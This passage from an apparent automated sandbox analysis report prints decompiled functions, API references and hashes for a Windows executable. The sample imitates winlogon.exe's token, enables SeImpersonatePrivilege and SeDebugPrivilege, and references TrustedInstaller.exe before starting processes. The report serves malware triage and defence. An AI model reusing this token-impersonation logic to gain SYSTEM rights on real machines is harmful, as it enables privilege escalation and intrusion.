                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
                                                                                                                				void* _t6;
                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                				_Unknown_base(*)()* _t12;
                                                                                                                				CHAR* _t13;
                                                                                                                				intOrPtr* _t17;
                                                                                                                
                                                                                                                				if( *__esi == 0) {
                                                                                                                					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                                                					 *_t17 = "GetModuleBaseNameW";
                                                                                                                					 *__esi = _t7;
                                                                                                                					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                                                					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                					__esi[3] = _t12;
                                                                                                                					return _t12;
                                                                                                                				}
                                                                                                                				return _t6;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				void _v538;
                                                                                                                				long _v540;
                                                                                                                				void _v1066;
                                                                                                                				char _v1068;
                                                                                                                				long _t30;
                                                                                                                				int _t33;
                                                                                                                				int _t39;
                                                                                                                				void* _t42;
                                                                                                                				void* _t45;
                                                                                                                				long _t49;
                                                                                                                
                                                                                                                				_t45 = __edx;
                                                                                                                				_v540 = 0;
                                                                                                                				memset( &_v538, 0, 0x208);
                                                                                                                				_v1068 = 0;
                                                                                                                				memset( &_v1066, 0, 0x208);
                                                                                                                				E00404C3C( &_v540);
                                                                                                                				_t48 = L"winlogon.exe";
                                                                                                                				_t39 = wcslen(L"winlogon.exe");
                                                                                                                				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                                                				_t53 = _t39 + _t8 - 0x104;
                                                                                                                				_pop(_t42);
                                                                                                                				if(_t39 + _t8 >= 0x104) {
                                                                                                                					_v1068 = 0;
                                                                                                                				} else {
                                                                                                                					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                                                					_pop(_t42);
                                                                                                                				}
                                                                                                                				_v8 = 0;
                                                                                                                				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                                                				_t49 = _t30;
                                                                                                                				_t54 = _t49;
                                                                                                                				if(_t49 == 0) {
                                                                                                                					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                                                					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                                                					if(_t33 == 0) {
                                                                                                                						_t49 = GetLastError();
                                                                                                                					}
                                                                                                                					CloseHandle(_v8);
                                                                                                                				}
                                                                                                                				return _t49;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                                                				int _t8;
                                                                                                                				struct HINSTANCE__* _t9;
                                                                                                                
                                                                                                                				if( *0x41c8e8 == 0) {
                                                                                                                					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					if(_t9 != 0) {
                                                                                                                						 *0x41c8e8 = 1;
                                                                                                                						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if( *0x41c8ec == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                					return _t8;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402F31(void* _a4) {
                                                                                                                				void _v530;
                                                                                                                				long _v532;
                                                                                                                				void* __edi;
                                                                                                                				wchar_t* _t15;
                                                                                                                				intOrPtr _t18;
                                                                                                                				short* _t19;
                                                                                                                				void* _t22;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_v532 = _v532 & 0x00000000;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					 *_t15 =  *_t15 & 0x00000000;
                                                                                                                				}
                                                                                                                				wcscat( &_v532, L".cfg");
                                                                                                                				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                				_t19 = _t18 + 0x5504;
                                                                                                                				_t36 =  *_t19;
                                                                                                                				_pop(_t29);
                                                                                                                				if( *_t19 != 0) {
                                                                                                                					E00404923(0x104,  &_v532, _t19);
                                                                                                                					_pop(_t29);
                                                                                                                				}
                                                                                                                				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
                                                                                                                				return _t22;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                				char _v16390;
                                                                                                                				short _v16392;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t30 = __ecx;
                                                                                                                				E0040B550(0x4004, __ecx);
                                                                                                                				_push(0x4000);
                                                                                                                				_push(0);
                                                                                                                				_v16392 = 0;
                                                                                                                				_t34 = _t30;
                                                                                                                				_push( &_v16390);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					memset();
                                                                                                                					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t37 =  ~_t36;
                                                                                                                					E004051B8( &_v16392, _t34, _a16);
                                                                                                                				} else {
                                                                                                                					memset();
                                                                                                                					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                				signed int _t16;
                                                                                                                				void** _t21;
                                                                                                                				signed int _t22;
                                                                                                                
                                                                                                                				_t21 = __edi;
                                                                                                                				_t22 =  *__eax;
                                                                                                                				if(__edx < _t22) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t13 =  *__edi;
                                                                                                                					do {
                                                                                                                						_t1 =  &_a8; // 0x4057e1
                                                                                                                						 *__eax =  *__eax +  *_t1;
                                                                                                                						_t16 =  *__eax;
                                                                                                                					} while (__edx >= _t16);
                                                                                                                					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                					 *__edi = _t8;
                                                                                                                					if(_t22 > 0) {
                                                                                                                						if(_t8 != 0) {
                                                                                                                							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                						}
                                                                                                                						free(_t13); // executed
                                                                                                                					}
                                                                                                                					return 0 |  *_t21 != 0x00000000;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
                                                                                                                				void _v2050;
                                                                                                                				signed short _v2052;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				WCHAR* _t18;
                                                                                                                
                                                                                                                				_v2052 = _v2052 & 0x00000000;
                                                                                                                				memset( &_v2050, 0, 0x7fe);
                                                                                                                				E00404C3C( &_v2052);
                                                                                                                				_t18 =  &_v2052;
                                                                                                                				E004047AF(_t18);
                                                                                                                				wcscat(_t18, _a4);
                                                                                                                				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                				if(_t16 == 0) {
                                                                                                                					return LoadLibraryW(_a4);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                  • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                  • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                  • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                				_t13 = _t8;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					FreeLibrary(_v8);
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                  • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 187924719-0
                                                                                                                • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t6;
                                                                                                                				void* _t8;
                                                                                                                				struct HINSTANCE__** _t10;
                                                                                                                
                                                                                                                				_t10 = __eax;
                                                                                                                				E00409921(__eax);
                                                                                                                				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                				if(_t6 == 0) {
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                				return _t8;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                  • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
